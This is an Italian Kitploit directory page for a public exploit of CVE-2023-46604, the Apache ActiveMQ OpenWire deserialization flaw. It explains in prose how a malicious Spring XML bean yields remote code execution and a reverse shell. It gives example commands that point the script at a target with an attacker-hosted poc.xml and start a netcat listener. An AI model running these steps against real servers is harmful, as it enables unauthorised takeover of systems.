Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-46604 — Lo script sfrutta una vulnerabilità di deserializzazione non sicura in Apache ActiveMQ (CVE-2023-46604) | Kitploit
Strumenti/GitHubGitHub/pulentoski/cve-2023-46604
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlStrumento di Accesso RemotoSviluppo Payload
GitHubpulentoski/cve-2023-46604

CVE-2023-46604

Lo script sfrutta una vulnerabilità di deserializzazione non sicura in Apache ActiveMQ (CVE-2023-46604)

Vedi Repository
112 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Resumen Técnico del Ataque: CVE-2023-46604

Il script sfrutta una vulnerabilità di deserializzazione non sicura in Apache ActiveMQ (CVE-2023-46604) per ottenere l'esecuzione remota di codice sul server target. Descrizione del Processo di Sfruttamento

root@kitploit:~
Obiettivo della Vulnerabilità:
    La vulnerabilità risiede nel protocollo OpenWire di Apache ActiveMQ.
    Consente la deserializzazione non sicura di oggetti, che può essere sfruttata per eseguire codice arbitrario sul server.

Requisiti Preliminari:
    Accesso di rete al server ActiveMQ.
    Un file XML malevolo (poc.xml) disponibile tramite un URL accessibile dal server target.

Componenti dell'Attacco:
    Script Python: Automatizza l'invio del payload malevolo al server ActiveMQ.
    File XML (poc.xml): Contiene un bean di Spring che definisce l'esecuzione di un comando malevolo (ad esempio, aprire una shell inversa).

Passi dell'Attacco

root@kitploit:~
Preparazione del Payload:
    Lo script costruisce un messaggio in esadecimale che include:
        Il nome della classe Java: org.springframework.context.support.ClassPathXmlApplicationContext.
        L'URL del file XML malevolo.
    Il payload viene convertito in una sequenza di byte che può essere inviata tramite il protocollo OpenWire.

Invio del Payload:
    Lo script apre una connessione socket TCP al server ActiveMQ sulla porta specificata (di default 61616).
    Invia il payload malevolo al server.

Esecuzione del Codice Malevolo:
    Il server ActiveMQ deserializza l'oggetto specificato nel payload.
    A causa della deserializzazione non sicura, viene caricato ed eseguito il bean di Spring definito nel file XML.
    Questo bean esegue un comando malevolo (ad esempio, una shell inversa) sul server.

    _________________________________________________________

esempio di esecuzione:

  • python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml

  • nc -lvnp 9001

questo script è stato copiato e modificato in italiano:https://github.com/evkl1d/CVE-2023-46604.git

Scarica lo strumento